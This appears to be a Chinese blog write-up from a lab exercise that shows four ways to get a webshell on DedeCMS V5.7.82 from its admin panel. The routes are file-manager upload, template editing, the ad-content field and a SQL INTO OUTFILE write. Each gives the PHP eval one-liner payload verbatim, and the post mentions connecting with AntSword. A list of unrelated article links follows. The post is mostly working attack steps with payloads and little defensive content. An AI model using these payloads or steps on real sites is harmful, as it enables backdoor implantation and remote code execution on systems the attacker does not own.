当前位置: 首页 > news >正文

DedeCMS-V5.7.82-UTF8织梦

先进行安装

然后进入首页和管理员后台  内容要在后台进行操作

首页

后台

1.通过文件管理器上传WebShell

访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshel

登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话代
码上传

2.修改模板文件拿shell

   点击模板 默认模板管理  index.html 然后点击修改

写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>

然后保存

接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化…

3.后台任意命令执行拿WebShell

<?php phpinfo();eval($_POST['cmd']);?>

步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添
加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

拿蚁剑测试连接

4.SQL命令行

输入一句话木马

select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 复现一下最近学习的漏洞(sqlab 1-10)
  • 速盾:爬虫攻击和cc攻击的区别是什么?
  • Git在日常项目中的实用技巧
  • 汉诺塔(C++)
  • 2024华数杯数学建模A题完整论文讲解(含每一问python代码+结果+可视化图)
  • 总线学习4--UART
  • pom.xml和.m2的setting的区别?
  • 【秋招笔试】24-07-27-OPPO-秋招笔试题(后端卷)
  • ES相关介绍与扫盲
  • 【C语言】C语言期末突击/考研--详解一维数组与字符数组
  • 罗杰斯的逆势投资:破而后立
  • 如何选择合适的气膜生产厂家—轻空间
  • 动态规划.
  • (四)软件性能测试
  • Python基于Prophet实现时间序列数据趋势周期特征提取项目实战
  • Docker下部署自己的LNMP工作环境
  • Linux后台研发超实用命令总结
  • Protobuf3语言指南
  • UEditor初始化失败(实例已存在,但视图未渲染出来,单页化)
  • Vim Clutch | 面向脚踏板编程……
  • 创建一种深思熟虑的文化
  • 发布国内首个无服务器容器服务,运维效率从未如此高效
  • 基于阿里云移动推送的移动应用推送模式最佳实践
  • 力扣(LeetCode)56
  • 如何编写一个可升级的智能合约
  • 算法---两个栈实现一个队列
  • 我与Jetbrains的这些年
  • media数据库操作,可以进行增删改查,实现回收站,隐私照片功能 SharedPreferences存储地址:
  • Java性能优化之JVM GC(垃圾回收机制)
  • 仓管云——企业云erp功能有哪些?
  • ​TypeScript都不会用,也敢说会前端?
  • #565. 查找之大编号
  • #HarmonyOS:基础语法
  • #if 1...#endif
  • (13)DroneCAN 适配器节点(一)
  • (2)Java 简介
  • (C++二叉树05) 合并二叉树 二叉搜索树中的搜索 验证二叉搜索树
  • (MATLAB)第五章-矩阵运算
  • (多级缓存)多级缓存
  • (附程序)AD采集中的10种经典软件滤波程序优缺点分析
  • (回溯) LeetCode 77. 组合
  • (十) 初识 Docker file
  • (算法)求1到1亿间的质数或素数
  • (图)IntelliTrace Tools 跟踪云端程序
  • (已解决)什么是vue导航守卫
  • (转)Scala的“=”符号简介
  • (转)树状数组
  • *setTimeout实现text输入在用户停顿时才调用事件!*
  • .NET “底层”异步编程模式——异步编程模型(Asynchronous Programming Model,APM)...
  • .NET Core SkiaSharp 替代 System.Drawing.Common 的一些用法
  • .Net Core 笔试1
  • .Net MVC4 上传大文件,并保存表单
  • .Net 中的反射(动态创建类型实例) - Part.4(转自http://www.tracefact.net/CLR-and-Framework/Reflection-Part4.aspx)...
  • .Net+SQL Server企业应用性能优化笔记4——精确查找瓶颈
  • .NET单元测试使用AutoFixture按需填充的方法总结